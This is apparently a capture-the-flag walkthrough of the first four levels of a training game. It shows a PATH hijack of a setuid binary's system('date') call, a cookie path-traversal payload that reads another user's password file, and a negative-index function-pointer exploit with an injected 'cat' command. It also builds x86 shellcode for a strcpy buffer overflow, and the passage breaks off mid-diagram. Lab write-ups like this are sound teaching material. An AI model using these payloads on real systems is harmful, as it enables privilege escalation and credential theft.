Ok, start by ssh-ing to level01@ec2-23-22-123-94.compute-1.amazonaws.com
with
password w5kjAsSKEjCT
. Our goal is to read the file .password
from the level02
user's home directory: /home/level02
. Let's look for low-hanging fruit - maybe we
can just read the file directly:
$ ls -l /home/level02/.password
-r-------- 1 level02 root 13 2013-09-06 05:04 /home/level02/.password
$ cat /home/level02/.password
cat: /home/level02/.password: Permission denied
Ok, well it was worth a try. Let's look at our hint: "You may find the binary
/levels/level01
and its source code /levels/level01.c
useful." Good, let's
check that stuff out:
$ ls -l /levels/level01 /levels/level01.c
-r-Sr-x--- 1 level02 level01 8617 2012-03-14 09:06 /levels/level01
-r--r----- 1 level01 level01 152 2012-03-14 09:06 /levels/level01.c
Ok cool, so we found out that we have permission to execute the binary and read
the source file. There is also that curious S
, which is the setuid
bit.
This is our first great clue at how to approach this level - it means the
level01
program will always run with the permissions of the level02
user,
instead of those of the user running it.
Let's start by simply running the binary:
$ /levels/level01
Current time: Fri Sep 6 04:25:06 UTC 2013
Ok, seems pretty innocuous. Let's check out the source:
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv)
{
printf("Current time: ");
fflush(stdout);
system("date");
return 0;
}
Bingo - that system("date")
call is going to inherit permissions from our
binary, which we already know has access to the level02
user's password.
All we need to do is replace the date
program with one of our own:
#!/bin/sh
cat /home/level02/.password
...And make it executable, so that it works with the system
call:
$ chmod a+x date
Now, as long as we make sure the level01
binary finds our version of date
instead of the one from the system, we'll get the password:
$ PATH=.:$PATH /levels/level01
Current time: PpIFwe32ODvy
Voila!
Alright, now we log in as the level02
user with the password "PpIFwe32ODvy".
Apparently this is a web-based vulnerability, and we're directed to point our
browser at the /level02.php
path on the server. I don't have port 80 open to
the server, so we'll just have to use curl locally:
$ curl http://0.0.0.0/level02.php
We get back some very friendly HTML:
<html>
<head>
<title>Level02</title>
</head>
<body>
<h1>Welcome to the challenge!</h1>
<div class="main">
<p><p>Looks like a first time user. Hello, there!</p></p>
<form action="#" method="post">
Name: <input name="name" type="text" length="40" /><br />
Age: <input name="age" type="text" length="2" /><br /><br />
<input type="submit" value="Submit!" />
</form>
</div>
</body>
</html>
Ok, let's try POSTing to the nice form:
$ curl -d "name=James&age=27" http://0.0.0.0/level02.php
Now we don't have the form, and it knows some information about us, but it still thinks we're a first time user:
<html>
<head>
<title>Level02</title>
</head>
<body>
<h1>Welcome to the challenge!</h1>
<div class="main">
<p><p>Looks like a first time user. Hello, there!</p></p>
You're James, and your age is 27 </div>
</body>
</html>
Even without looking at the source, we can guess that there is some sort of statefulness going on in this application, and in HTTP, statefulness means cookies. Let's see what the headers say:
$ curl -v -d "name=James&age=27" http://0.0.0.0/level02.php
...
< HTTP/1.1 200 OK
< Date: Fri, 06 Sep 2013 06:05:21 GMT
< Server: Apache/2.2.14 (Ubuntu)
< X-Powered-By: PHP/5.3.2-1ubuntu4.14
< Set-Cookie: user_details=acjpu4h45pxcqoz.txt
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
...
Neat, we have a Set-Cookie
in there, let's try just sending that right back:
$ curl -v -d "name=James&age=27" -H "Cookie: user_details=acjpu4h45pxcqoz.txt" http://0.0.0.0/level02.php
...
> POST /level02.php HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15
> Host: 0.0.0.0
> Accept: */*
> Cookie: user_details=acjpu4h45pxcqoz.txt
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Fri, 06 Sep 2013 06:09:42 GMT
< Server: Apache/2.2.14 (Ubuntu)
< X-Powered-By: PHP/5.3.2-1ubuntu4.14
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
<
<html>
<head>
<title>Level02</title>
</head>
<body>
<h1>Welcome to the challenge!</h1>
<div class="main">
<p>127.0.0.1 using curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15</p>
You're James, and your age is 27 </div>
</body>
</html>
...
Lookie there, it no longer thinks we're a new user! It even knows our IP and user agent. Sort of spooky. Let's see what happens when we go back to our original GET, but keep our cookie:
$ curl -v -H "Cookie: user_details=acjpu4h45pxcqoz.txt" http://0.0.0.0/level02.php
<html>
<head>
<title>Level02</title>
</head>
<body>
<h1>Welcome to the challenge!</h1>
<div class="main">
<p>127.0.0.1 using curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15</p>
<form action="#" method="post">
Name: <input name="name" type="text" length="40" /><br />
Age: <input name="age" type="text" length="2" /><br /><br />
<input type="submit" value="Submit!" />
</form>
</div>
</body>
</html>
We get the form back, but now it knows our info. Ok, so now we actually have a
clue, before even looking at the source. The cookie has the form user_details=<blah>.txt
.
I'm guessing <blah>.txt
is a real file being written, and I just bet it's
owned by the level03
user, which means we might be able to use HTTP requests
with crafted cookie headers to read arbitrary files owned by the level03
user.
Ok, let's finally look at the source. It's in /var/www/level02.php
. Here are
the interesting parts:
$out = '';
if (!isset($_COOKIE['user_details'])) {
# Creates a random temp file and sets $out to be a placeholder
}
else {
$out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);
}
# ...
<h1>Welcome to the challenge!</h1>
<div class="main">
<p><?php echo $out ?></p>
# ...
The else
block and the echo $out
together allow us to grab arbitrary file
contents through a simple request. We just need to set our user_details
cookie
to point to a relative path from /tmp/level02/
to /home/level03/.password
:
$ curl -H "Cookie: user_details=../../home/level03/.password" http://0.0.0.0/level02.php
<html>
<head>
<title>Level02</title>
</head>
<body>
<h1>Welcome to the challenge!</h1>
<div class="main">
<p>RRLQAx7iwvvH
</p>
<form action="#" method="post">
Name: <input name="name" type="text" length="40" /><br />
Age: <input name="age" type="text" length="2" /><br /><br />
<input type="submit" value="Submit!" />
</form>
</div>
</body>
</html>
BOOM.
Woot, let's log in as the level03
user with the password "RRLQAx7iwvvH". Same
drill, but this time with a binary /levels/level03
and matching source file
/levels/level03.c
. Let's go straight to running it:
$ /levels/level03
Usage: ./level03 INDEX STRING
Possible indices:
[0] to_upper [1] to_lower
[2] capitalize [3] length
$ /levels/level03 0 abcd
Uppercased string: ABCD
$ /levels/level03 1 abcd
Lowercased string: abcd
$ /levels/level03 2 abcd
Capitalized string: Abcd
$ /levels/level03 3 abcd
Length of string 'abcd': 4
$ /levels/level03 4 abcd
Invalid index.
Possible indices:
[0] to_upper [1] to_lower
[2] capitalize [3] length
Ok, pretty straightforward - error handling seems reasonably good. Nothing at all obvious here. Let's hit the code. There are a few interesting sections. First, it just defines how many functions there are, a function type for them, and the functions themselves:
#define NUM_FNS 4
typedef int (*fn_ptr)(const char *);
int to_upper(const char *str) { /* ... */ }
int to_lower(const char *str) { /* ... */ }
int capitalize(const char *str) { /* ... */ }
int length(const char *str) { /* ... */ }
Then, there's the curious case of a deprecated function:
int run(const char *str)
{
// This function is now deprecated.
return system(str);
}
We'll pretty obviously want to be figuring out how to call that, but it isn't called directly anywhere in the file. Then, the relatively simple, but juicy, function that dynamically calls the proper function:
int truncate_and_call(fn_ptr *fns, int index, char *user_string)
{
char buf[64];
// Truncate supplied string
strncpy(buf, user_string, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = '\0';
return fns[index](buf);
}
The array of pointers to fn_ptr
s is actually passed in from main, and is
defined statically:
fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};
Finally, the guard for the index is interesting:
index = atoi(argv[1]);
if (index >= NUM_FNS) { /* ... */ }
Pulling a few strands together, it looks like we need a way to make fns[index]
give us a reference to run
, which we can then provide a string to, such as
"cat /home/level04/.password" and have run under the level04
user's permissions.
Let's therfore look very closely at this single line fragment: fns[index](buf)
.
Of the three parts of that fragment, fns
, index
, and buf
, one is the structure
we'd like to muck with and the other two are user provided. Let's take them case by
case:
buf
- Can we overflow our buffer? The use ofstrncpy
seems to make this a dead end.fns
- Can we inject the address of therun
function into this structure somehow? It seems like no, because it is statically defined to point to those exact four functions.index
- Can we muck with index in a way that is clearly not intended? Actually, yes! Note thatatoi
is signed, but the guard is only checking for index values greater than 4. We can pass in negative values!
So now we know our goal - we want to pass a negative value for index that will
cause the run
function to be called with a command that prints us the desired
password. What fns[index]
really does is *(fns + index)
with fns
treated
as a 4-byte pointer value. If fns
points to 0x10, then fns + 1
points to
0x14 and fns - 1
points to 0x0c. What we need is to find an offset from fns
that is a memory address pointing to a chunk of 4 bytes that represent the memory
location of the run
function. The address of the run
function is unlikely to
live in memory anywhere, so we'll have to put it there ourselves. Which means
we'll first need to know where it is. There are a few ways (that I know of) to
do this:
With GDB:
$ gdb -d /levels /levels/level03
# ...
(gdb) print run
$1 = {int (const char *)} 0x804875b <run>
With objdump:
$ objdump -t /levels/level03 | grep "run$"
0804875b g F .text 00000013 run
With nm:
$ nm /levels/level03 | grep run$
0804875b T run
I prefer to use gdb, because it's useful for other stuff anyway, as we'll see
in a moment. In any case, that sucker lives at 0x804875b. That's all fine and
good, but how do we get that value into memory somewhere? Well, there's only
one thing that we (almost) fully control, and that is the memory chunk that
ends up in buf
. Conveniently, that happens to be sitting on the stack just a
few short bytes up (negative!) from where fns
points. Here's where gdb comes
in again, let's figure out exactly how many bytes up:
$ gdb -d /levels /levels/level03
# ...
(gdb) list
59 // Truncate supplied string
60 strncpy(buf, user_string, sizeof(buf) - 1);
61 buf[sizeof(buf) - 1] = '\0';
62 return fns[index](buf);
63 }
64
65 int main(int argc, char **argv)
66 {
67 int index;
68 fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};
(gdb) break 62
Breakpoint 1 at 0x80487a9: file level03.c, line 62.
(gdb) run 0 abcd
# ...
Breakpoint 1, truncate_and_call (fns=0xff96457c, index=0,
user_string=0xff96492c "abcd") at level03.c:62
62 return fns[index](buf);
(gdb) print fns
$1 = (fn_ptr *) 0xff96457c
(gdb) print &buf
$3 = (char (*)[64]) 0xff96450c
(gdb) print (0xff96457c - 0xff96450c) / 4
$8 = 28
Nifty! Now we know that if we input -28 for index
, the value of fns[index]
will be an address constructed from the first four bytes of the string that we
input! Let's try that:
(gdb) kill
Kill the program being debugged? (y or n) y
(gdb) run -28 abcd
# ...
Breakpoint 1, truncate_and_call (fns=0xffdcc81c, index=-28,
user_string=0xffdce92c "abcd") at level03.c:62
62 return fns[index](buf);
(gdb) print fns[index]
$9 = (fn_ptr) 0x64636261
Wow, sure enough, 0x61 is the hex ascii for the 'a' character, 0x62 is 'b',
0x63 is 'c' and 0x64 is 'd'. They're "backwards" because the x86 is a little-
endian architecture, and that's just how chunks of 4 bytes work. If we were on
a big-endian system, the sequence of bytes [ 0x61, 0x62, 0x63, 0x64 ] would
represent the 4-byte word 0x61626364, but on a little-endian system it's the
opposite. This is not a big deal at all, as long as you are aware of it. Ok,
for our next trick, let's get our run
address in there instead of 0x64636261:
(gdb) run -28 "`echo -e "\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xfffd9f6c, index=-28,
user_string=0xfffdb92c "[\207\004\b") at level03.c:62
62 return fns[index](buf);
Note, I called out to echo with the -e
option for interpreting escape sequences,
otherwise we would just end up with literal "", "x", "5", "b", etc. instead of a
single byte representing the value 0x5b, etc. Also note, I listed the bytes in
"backwards" little-endian order. Let's see what this looks like in memory:
(gdb) x/64xb buf
0xfffd9efc: 0x5b 0x87 0x04 0x08 0x00 0x00 0x00 0x00
0xfffd9f04: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f0c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f14: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f1c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f24: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f2c: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xfffd9f34: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
That syntax just means "examine the first 64 hex-formatted bytes of buf
". We
can see our values right there where we want them! Let's see if that translates
into getting what we want out of fns
:
(gdb) print fns[index]
$1 = (fn_ptr) 0x804875b <run>
Bullseye. Let's just let the program run:
(gdb) continue
Continuing.
sh: [: not found
Program exited normally.
Ok, what happened here? Well, all we have in buf
is four bytes of gobbledegook.
We called system("\x5b\x87\x04\x08")
, which makes no sense. What we need to do
is make the first part of buf
do real work, followed by our crafted call to run
.
Let's try this: "cat /home/level04/.password;#\x5b\x87\x04\x08". We should be
sending two semi-colon-separated commands to system
, the second of which is
just a comment (because of the '#' in front of it) and should have no effect:
(gdb) run -28 "`echo -e "cat /home/level04/.password;#\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffa0fbec, index=-28,
user_string=0xffa1090f "cat /home/level04/.password;#[\207\004\b") at level03.c:62
62 return fns[index](buf);
(gdb) print fns[index]
$2 = (fn_ptr) 0x20746163
Well duh, that's not right, we added a bunch of stuff at the beginning of buf
,
so we need to change our index. Let's figure out what the right value is now:
(gdb) x/64xb buf
0xffa0fb7c: 0x63 0x61 0x74 0x20 0x2f 0x68 0x6f 0x6d
0xffa0fb84: 0x65 0x2f 0x6c 0x65 0x76 0x65 0x6c 0x30
0xffa0fb8c: 0x34 0x2f 0x2e 0x70 0x61 0x73 0x73 0x77
0xffa0fb94: 0x6f 0x72 0x64 0x3b 0x23 0x5b 0x87 0x04
0xffa0fb9c: 0x08 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffa0fba4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffa0fbac: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffa0fbb4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Hmm, our bytes are there, but they aren't aligned on a word boundary, so we can't use them yet. We have two options: we could try to remove one character, or add three. Heck, let's try to remove the '#' - maybe we'll get an error, but we will have already seen the password and won't care:
(gdb) kill
Kill the program being debugged? (y or n) y
(gdb) run -28 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffacde2c, index=-28,
user_string=0xfface910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62 return fns[index](buf);
(gdb) x/64xb buf
0xffacddbc: 0x63 0x61 0x74 0x20 0x2f 0x68 0x6f 0x6d
0xffacddc4: 0x65 0x2f 0x6c 0x65 0x76 0x65 0x6c 0x30
0xffacddcc: 0x34 0x2f 0x2e 0x70 0x61 0x73 0x73 0x77
0xffacddd4: 0x6f 0x72 0x64 0x3b 0x5b 0x87 0x04 0x08
0xffacdddc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffacdde4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffacddec: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xffacddf4: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Alright there we are, our bytes are in the second half of the line marked 0xffacddd4, which means they begin at the word boundary 0xffacddd8. Let's figure out what index we need to get there:
(gdb) print fns
$3 = (fn_ptr *) 0xffacde2c
(gdb) print (0xffacde2c - 0xffacddd8) / 4
$4 = 21
(gdb) print fns[-21]
$5 = (fn_ptr) 0x804875b <run>
Huzzah! Let's put it all together:
(gdb) run -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
Breakpoint 1, truncate_and_call (fns=0xffbc988c, index=-21,
user_string=0xffbca910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62 return fns[index](buf);
(gdb) print fns[index]
$6 = (fn_ptr) 0x804875b <run>
(gdb) c
Continuing.
cat: /home/level04/.password: Permission denied
sh: [: not found
Program exited normally.
Ah, yes, we got an error because gdb doesn't allow the normal setuid rules - if it did, this sort of thing would be way too easy! But it definitely looks like we ran the command we expected, so let's run it outside gdb!
$ /levels/level03 -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
0lIhigNwu6RT
sh: [: not found
Look! A password! Whew, the game was certainly taken to a new level on this one.
Same drill - log in as level04
with password "0lIhigNwu6RT". We're looking
for a password in /home/level05/.password
and we have access to the /levels/level04
binary, which is owned by the level05 user and has setuid set, and its source in
/levels/level04.c`. There is also a hint: "The vulnerabilities overfloweth!". Oh
boy. As usual, let's start by running the thing:
$ /levels/level04
Usage: ./level04 STRING
Interestingly, there's also not a newline at the end of the output. That seems suspicious right off the bat. Let's run with some input:
$ /levels/level04 abcd
Oh no! That didn't work!
$ /levels/level04 help
Oh no! That didn't work!
Ok, this is getting us nowhere. To the code! Alright, this one is short, so here's the whole thing:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void fun(char *str)
{
char buf[1024];
strcpy(buf, str);
}
int main(int argc, char **argv)
{
if (argc != 2) {
printf("Usage: ./level04 STRING");
exit(-1);
}
fun(argv[1]);
printf("Oh no! That didn't work!\n");
return 0;
}
Between the hint, and the use of strcpy
instead of strncpy
for user data, we
can quickly ascertain that we're going for a buffer overflow here. Whatever we
send for the STRING argument to the program past 1024 bytes will begin overwriting
memory that we shouldn't have access to. What to do with that overflow seems to be
the tough part. We don't have any built-in run
function as in the last level,
and we need something just like it, which suggests to me that we want to write
our own version in a format that is suitable for injecting through program input.
I think the easiest way to do this is actually to go look at what the compiled
version of the run
function from the previous level looks like:
(gdb) print run
$1 = {int (const char *)} 0x804875b <run>
(gdb) set disassembly-flavor intel
(gdb) disassemble run
Dump of assembler code for function run:
0x0804875b <+0>: push ebp
0x0804875c <+1>: mov ebp,esp
0x0804875e <+3>: sub esp,0x18
0x08048761 <+6>: mov eax,DWORD PTR [ebp+0x8]
0x08048764 <+9>: mov DWORD PTR [esp],eax
0x08048767 <+12>: call 0x804847c <system@plt>
0x0804876c <+17>: leave
0x0804876d <+18>: ret
End of assembler dump.
Alright, so we know it starts at 0x0804875b and does a few things, most notably
the call to 0x0804847c, which appears to be where the system
call from the stdlib
lives, and ends at 0x0804876d. The rest of the function is not too clear to me,
but it is probably related to the function calling convention - we know we pass
a const char *
to the run function, which at the assembly level is just going
to me we put a single 32-bit value somewhere that the procedure knows to find it.
Let's back log in as the level03
user and step through the actual instructions
that call run
to see what's going on:
$ gdb -d /levels /levels/level03
# ...
(gdb) break 62
Breakpoint 1 at 0x80487a9: file level03.c, line 62.
(gdb) run -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffc3242c, index=-21,
user_string=0xffc32910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62 return fns[index](buf);
(gdb) set disassembly-flavor intel
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ... Elided beginning of function up to return from strncpy
=> 0x080487a9 <+59>: mov eax,DWORD PTR [ebp+0xc]
0x080487ac <+62>: shl eax,0x2
0x080487af <+65>: add eax,DWORD PTR [ebp-0x5c]
0x080487b2 <+68>: mov edx,DWORD PTR [eax]
0x080487b4 <+70>: lea eax,[ebp-0x4c]
0x080487b7 <+73>: mov DWORD PTR [esp],eax
0x080487ba <+76>: call edx
# ... Elided end of function
End of assembler dump.
(gdb) print fns[index]
$1 = (fn_ptr) 0x804875b <run>
(gdb) print &buf
$3 = (char (*)[64]) 0xffc323bc
So we expect to call the function at 0x0804875b with the argument 0xffc323bc. We eventually call whatever is in edx, so let's see what that is after the first few instructions of the sequence:
(gdb) stepi
0x080487ac 62 return fns[index](buf);
(gdb) stepi
0x080487af 62 return fns[index](buf);
(gdb) stepi
0x080487b2 62 return fns[index](buf);
(gdb) stepi
0x080487b4 62 return fns[index](buf);
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ...
0x080487a9 <+59>: mov eax,DWORD PTR [ebp+0xc]
0x080487ac <+62>: shl eax,0x2
0x080487af <+65>: add eax,DWORD PTR [ebp-0x5c]
0x080487b2 <+68>: mov edx,DWORD PTR [eax]
=> 0x080487b4 <+70>: lea eax,[ebp-0x4c]
0x080487b7 <+73>: mov DWORD PTR [esp],eax
0x080487ba <+76>: call edx
# ...
End of assembler dump.
(gdb) print/x $edx
$7 = 0x804875b
Sure enough, there's the address of run
, as expected. The more interesting part
is what happens with the address of buf
:
(gdb) stepi
0x080487b7 62 return fns[index](buf);
(gdb) stepi
0x080487ba 62 return fns[index](buf);
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ...
0x080487a9 <+59>: mov eax,DWORD PTR [ebp+0xc]
0x080487ac <+62>: shl eax,0x2
0x080487af <+65>: add eax,DWORD PTR [ebp-0x5c]
0x080487b2 <+68>: mov edx,DWORD PTR [eax]
0x080487b4 <+70>: lea eax,[ebp-0x4c]
0x080487b7 <+73>: mov DWORD PTR [esp],eax
=> 0x080487ba <+76>: call edx
# ...
End of assembler dump.
(gdb) x/4xb $esp
0xffc32390: 0xbc 0x23 0xc3 0xff
(gdb) x/1xw $esp
0xffc32390: 0xffc323bc
Oh, hello there &buf
- it's simply been put on the top of the stack. The
standard C calling convention just pushes arguments on the stack, in reverse
order, but since we only have one argument, it's right on the top. Let's revisit
the run
function with this knowledge:
(gdb) stepi
run (str=0xffc323bc "cat /home/level04/.password;[\207\004\b") at level03.c:51
51 {
(gdb) disassemble
Dump of assembler code for function run:
=> 0x0804875b <+0>: push ebp
0x0804875c <+1>: mov ebp,esp
0x0804875e <+3>: sub esp,0x18
0x08048761 <+6>: mov eax,DWORD PTR [ebp+0x8]
0x08048764 <+9>: mov DWORD PTR [esp],eax
0x08048767 <+12>: call 0x804847c <system@plt>
0x0804876c <+17>: leave
0x0804876d <+18>: ret
End of assembler dump.
(gdb) stepi
0x0804875c 51 {
(gdb) stepi
0x0804875e 51 {
(gdb) stepi
53 return system(str);
(gdb) stepi
0x08048764 53 return system(str);
(gdb) stepi
0x08048767 53 return system(str);
(gdb) disassemble
Dump of assembler code for function run:
0x0804875b <+0>: push ebp
0x0804875c <+1>: mov ebp,esp
0x0804875e <+3>: sub esp,0x18
0x08048761 <+6>: mov eax,DWORD PTR [ebp+0x8]
0x08048764 <+9>: mov DWORD PTR [esp],eax
=> 0x08048767 <+12>: call 0x804847c <system@plt>
0x0804876c <+17>: leave
0x0804876d <+18>: ret
End of assembler dump.
(gdb) x/1xw $esp
0xffc32370: 0xffc323bc
So all we really did was create ourselves a new 24-word stack frame (I don't
really know why, since we're only using one word of it, but maybe there's a
minimum for some reason), and then push the location of our buffer onto it.
What we've learned from all of this, is that in order to call the system
funtion, all we really need to do is push the location of our buffer onto the
stack and call into the absolute location of system
in our object. Of course,
we need actual machine code to do these things. Honestly, I think the easiest way
to do this is to just write what we want locally, run it through an assembler,
and pick out the parts we're interested in. Here's are the instructions we want,
using the values from the level03
example, which we'll have to change later:
push DWORD 0xffc323bc ; Push our buffer address onto the stack
mov eax, 0x0804847c ; Move `system`s address into a register
call eax ; Call `system`
We can't just call 0x0804847c
, because immediates are always relative addresses
in the call instruction - it works to write that code, but nasm is cleverly translating
our absolute address into a relative one at assembly time.
One easy way to get the right machine code out of those instructions is to put them
into a program we can run and inspect in gdb. Let's make a file named callsystem.asm
:
SECTION .data
SECTION .bss
SECTION .text
global _start
_start:
push DWORD 0xffc323bc ; Push our buffer address onto the stack
mov eax, 0x804847c ; Move `system`s address into a register
call eax ; Call `system`
mov eax, 1 ; `exit` syscall
mov ebx, 0 ; Exit code 0
int 0x80 ; Exit
You'll need the nasm assembler locally to make anything out of that, and we'll need to know what our target is. We can figure that out by looking at what kinds of binaries we've been working with thus far:
$ file /levels/level04
/levels/level04: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
We can assemble callsystem.asm
into a 32-bit ELF object with debug symbols using
nasm, and link it into an executable with ld:
nasm -g -o callsystem.o callsystem.asm
ld -o callsystem callsystem.o
Now we can attach gdb and look around:
$ gdb ./callsystem
(gdb) break _start
Breakpoint 1 at 0x8048060
(gdb) set disassembly-flavor intel
(gdb) run
Starting program: /vagrant/bin/hello
Breakpoint 1, 0x08048060 in _start ()
(gdb) disassemble
Dump of assembler code for function _start:
=> 0x08048060 <+0>: push 0xffc323bc
0x08048065 <+5>: mov eax,0x804847c
0x0804806a <+10>: call eax
0x0804806c <+12>: mov eax,0x1
0x08048071 <+17>: mov ebx,0x0
0x08048076 <+22>: int 0x80
End of assembler dump.
Ok, so we have a 5-byte push operation, a 5-byte mov and a 2-byte call. Let's see what they look like:
(gdb) x/5xb 0x08048060
0x8048060 <_start>: 0x68 0xbc 0x23 0xc3 0xff
(gdb) x/5xb 0x08048065
0x8048065 <_start+5>: 0xb8 0x7c 0x84 0x04 0x08
(gdb) x/2xb 0x0804806a
0x804806a <_start+10>: 0xff 0xd0
(gdb) x/12xb 0x08048060
0x8048060 <_start>: 0x68 0xbc 0x23 0xc3 0xff 0xb8 0x7c 0x84
0x8048068 <_start+8>: 0x04 0x08 0xff 0xd0
It's encouraging to see our literal 0xffc323bc and 0x0804847c values peaking
through - we'll be changing those values eventually. Let's get this into a string
using echo -n
as before:
$ echo -e "\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0"
h�#���|��
Good, it should look like nonsense. There are lots of other ways to get this
information than building a little runnable binary and attaching gdb to it. I'll
describe one easy way. First make a simpler.asm
file:
SECTION .text
push DWORD 0xffc323bc ; Push our buffer address onto the stack
mov eax, 0x804847c ; Move `system`s address into a register
call eax ; Call `system`
Assemble it with nasm -f elf32 -o simpler.o simpler.asm
and use objdump to see what's
in simpler.o
:
$ objdump -s simpler.o
simpler.o: file format elf32-i386
Contents of section .text:
0000 68bc23c3 ffb87c84 0408ffd0 h.#...|.....
Since the only thing in our object file is the code for our instructions, the
entirety of the contents of the .text section is what we need. The 0000
at the
beginning is just the address, the rest of the hex are our bytes. Notice that
they're identical to what we found using gdb.
Alright, it's finally time to start mucking around with the level04
program itself.
Let's get in there with gdb and poke around:
$ gdb -d /levels /levels/level04
# ...
Reading symbols from /levels/level04...(no debugging symbols found)...done.
(gdb) list
No symbol table is loaded. Use the "file" command.
Bummer. Hopefully we can rely purely on the source and disassembly to figure
things out. Let's get in there and see what fun
looks like:
(gdb) break fun
Breakpoint 1 at 0x804848d
(gdb) run abcd
Breakpoint 1, 0x0804848d in fun ()
(gdb) disassemble
Dump of assembler code for function fun:
0x08048484 <+0>: push ebp
0x08048485 <+1>: mov ebp,esp
0x08048487 <+3>: sub esp,0x418
=> 0x0804848d <+9>: mov eax,DWORD PTR [ebp+0x8]
0x08048490 <+12>: mov DWORD PTR [esp+0x4],eax
0x08048494 <+16>: lea eax,[ebp-0x408]
0x0804849a <+22>: mov DWORD PTR [esp],eax
0x0804849d <+25>: call 0x8048388 <strcpy@plt>
0x080484a2 <+30>: leave
0x080484a3 <+31>: ret
End of assembler dump.
This whole thing is pretty much just interacting with the stack (I'm noticing a trend...), and it's confusing and important for what we're doing, so I'm going to draw some pictures of the stack. On entry, it looks like this:
esp ebp Address Value
| |
| |
| | +------------+------------+
| +--->| 0xffa3f218 | 0xffa3f298 | <-+
| +------------+------------+ |
| . | `main`s
| . | stack
| . | frame
| +------------+------------+ |
| | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| +------------+------------+ |
+-------->| 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
+------------+------------+
The first thing that happens is a standard stack-frame creation preamble. First,
the current ebp is saved onto the stack with push ebp
. Now it looks like this:
esp ebp Address Value
| | +------------+------------+
| +--->| 0xffa3f218 | 0xffa3f298 | <-+
| +------------+------------+ |
| . | `main`s
| . | stack
| . | frame
| +------------+------------+ |
| | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| +------------+------------+ |
| | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| +------------+------------+
+-------->| 0xffa3f200 | 0xffa3f218 |
+------------+------------+
Then, ebp is moved to the current stack position with mov ebp, esp
:
esp ebp Address Value
| | +------------+------------+
| | | 0xffa3f218 | 0xffa3f298 | <-+
| | +------------+------------+ |
| | . | `main`s
| | . | stack
| | . | frame
| | +------------+------------+ |
| | | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| | +------------+------------+ |
| | | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| | +------------+------------+
+----+--->| 0xffa3f1f8 | 0xffa3f218 |
+------------+------------+
Finally, fun
s allocates a 1048-byte stack frame with sub esp, 0x418
:
esp ebp Address Value
| | +------------+------------+
| | | 0xffa3f218 | 0xffa3f298 | <-+
| | +------------+------------+ |
| | . | `main`s
| | . | stack
| | . | frame
| | +------------+------------+ |
| | | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| | +------------+------------+ |
| | | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| | +------------+------------+
| +--->| 0xffa3f1f8 | 0xffa3f218 | <-+
| +------------+------------+ |
| . | `fun`s
| . | stack
| . | frame
| +------------+------------+ |
+-------->| 0xffa3ede0 | 0x???????? | <-+
+------------+------------+
Either for alignment reasons, or just to rub in how dumb I am, the compiler
allocates 1024 bytes of the stack frame for buf
, starting after two empty
words under the top of the frame. The frame ends with two more inexplicable
blank words, and two words which are eventually used to pass the two arguments
to strcpy
:
esp ebp Address Value
| | +------------+------------+
| | | 0xffa3f218 | 0xffa3f298 | <-+
| | +------------+------------+ |
| | . | `main`s
| | . | stack
| | . | frame
| | +------------+------------+ |
| | | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| | +------------+------------+ |
| | | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
